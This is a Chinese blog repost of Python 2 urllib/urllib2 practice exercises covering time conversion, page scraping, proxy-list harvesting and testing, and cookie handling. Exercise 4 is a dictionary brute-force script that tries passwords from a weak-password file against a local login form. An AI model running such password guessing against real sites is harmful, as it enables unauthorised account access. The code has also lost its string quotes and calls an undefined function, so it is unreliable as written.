码迷,mamicode.com
首页 > 编程语言 > 详细

python例子-urllib,urllib2练习题合集.

时间:2015-10-17 21:54:17      阅读:229      评论:0      收藏:0      [点我收藏+]

标签:

#!/usr/bin/python
#coding:utf-8
import time
import urllib
import urllib2
from bs4 import BeautifulSoup
import re
import cookielib

def main0():
    unix_timenow = int(time.time())
    print 当前时间:%d % unix_timenow

    timenow = time.strftime(%Y-%m-%d %H:%M:%S,time.localtime(unix_timenow))
    print 当前标准时间:%s % timenow

    time.sleep(3)
    unixtime = time.mktime(time.strptime(timenow,%Y-%m-%d %H:%M:%S))
    print unix时间:%s % unixtime

#1.将2015-1-16 12:00:00转化为unix时间,并计算此时间3天前的格式化时间和unix时间。
def main1():
    time1 = 2015-1-16 12:00:00
    unixtime1 = time.mktime(time.strptime(time1,%Y-%m-%d %H:%M:%S))
    print 1:unix时间戳:%s % unixtime1

    unixtime2 = unixtime1 - 60*60*24*3
    print 1:3天前时间戳:%s % unixtime2
    time2 = time.strftime(%Y-%m-%d %H:%M:%S,time.localtime(unixtime2))
    print 1:3天前格式化时间:%s % time2

#2、使用urllib访问百度首页,取得百度的title、返回状态码、内容长度、cookie值等信息。
def main2():
    url = http://www.baidu.com
    response = urllib.urlopen(url)
    headers = response.info()
    cookie = headers[Set-Cookie]        #如果有多个cookie.则一次性读完.                        
    html = response.read()                #就是一个str类型的html源码
    soup = BeautifulSoup(html)
    title = soup.title.string
    statucode = response.getcode()
    htmlLength = len(html)
    print title:%s\nstatus:%s\ncontentlength:%s\ncookie:%s % (title,statucode,htmlLength,cookie)

# 3、使用urllib访问http://www.cz88.net/proxy/index.shtml取得代理服务器的IP地址。
def main3():
    url = http://www.cz88.net/proxy/index.shtml
    response = urllib.urlopen(url)
    html = response.read()
    soup_html = BeautifulSoup(html)
    ip_div = soup_html.find_all(div,class_=box694)
    pattern = re.compile(<li><div class="ip">(.*?)</div><div class="port">(.*?)</div><div class="type">(.*?)</div><div class="addr".*?>(.*?)</div></li>)
    fwip = open(proxy_ip.txt,w)
    for i in ip_div[0].ul:
        #print ‘i:%s‘ % i
        items = re.findall(pattern,str(i))
        if items != [] :
            #print ‘items:%s‘ % items
            li = list(items[0])
            if li[0] != IP:
                 fwip.write(,.join(li)+\n)
    fwip.close()

# 4、urllib2模块练习
# 使用weak_passwd.txt弱口令文件,暴力破解http://127.0.0.1/www/Login/index.html用户名和密码。
def main4():
    fo = open(weak_passwd.txt,r)
    pass_list = fo.readlines()
    for i in pass_list:
        i = i.strip()
        isok = post(admin,i)
        if isok:
            print pasword:%s % i
            return
    fo.close()

def post(name,pwd):
    data = urllib.urlencode({"username":name,"password":pwd});
    content_length = len(data)
    headers = {
        "Host":"192.168.2.150",
        "Pragma":"no-cache",
        "Content-Length":content_length,
        "Accept": "text/html, application/xhtml+xml, */*",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NMJB; rv:11.0) like Gecko",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://192.168.1.139/www/Login/index.html",
        "Cookie": "thinkphp_show_page_trace=0|0; PHPSESSID=dbg5jjc9t76njqp6bimk43hjr4",
        }
        # Client = httplib.HTTPConnection("192.168.1.139",80,timeout=5)
        # Client.request("POST","/www/Login/login/",parames,headers)
        # response = Client.getresponse()
    
    url = http://192.168.1.139/www/Login/login/
    request = urllib2.Request(url,data,headers)
    response = urllib2.urlopen(request)
    if response.geturl() == http://192.168.1.139/www/Show/index.html:    #根据不同的网站需要判断不同的登陆成功方式
        return True
    else:
        return False

# 5、urllib2模块代理使用练习
#    将练习题3中得到的代理保存在文件中,使用urllib2的代理模块验证哪些代理是可用的。
def main6():
    proxy = proxy_ip.txt
    proxy_list = open(proxy,r).readlines()
    available_ip = []
    ip_tuple = None
    for i in proxy_list:
        i = i.split(,)
        isok = testProxy(i[0],i[1])
        if isok:
            available_ip.append((i[0],i[1]));
    for j in available_ip:
        print "available‘s IP is %s:%s" % (j[0],j[1])

def testProxy(ip,port):
    #proxyip = ‘http://%s:%s@%s‘ % (user, passwd, proxyserver)
    proxyip = http://%s:%s % (ip,port)
    proxy_handler = urllib2.ProxyHandler({http:proxyip})     #创建urllib2的ProxyHandler处理对象
    opener = urllib2.build_opener(proxy_handler)
    request = urllib2.Request(http://www.baidu.com)
    try:
        response = opener.open(request,timeout=5)
        statu = response.getcode()
        if statu == 200:
            return True
        else:
            return False
    except Exception, e:
        pass
    else:
        return False
    
#6.cookielib模块的使用
def main7():
    #cookiefile = ‘cookie.txt‘    #本地要保存的cookie文件名
    #cookie = cookielib.MozillaCookieJar(cookiefile)     #传入本地cookie文件名生成cookie对象.
    #cookie = cookielib.MozillaCookieJar()            #加载本地文件中的cookie时用此语句创建cookie对象
    #cookie.load(cookiefile)        #加载本地文件对象中cookie.
    cookie = cookielib.CookieJar()    #默认cookie创建方式
    cookie_handler = urllib2.HTTPCookieProcessor(cookie)    #将cookie对象加入HTTP中
    opener = urllib2.build_opener(cookie_handler)        #创建HTTP请求处理对象Handler
    url = "http://www.qq.com"
    request = urllib2.Request(url)
    response = opener.open(request,timeout=5)
    print response.getcode()

if __name__ == __main__:
    # main0()
    # main1()
    # main2()
    main3()
    # main4()
    main5()
    # main6()

 

python例子-urllib,urllib2练习题合集.

标签:

原文地址:http://www.cnblogs.com/xccnblogs/p/4888186.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!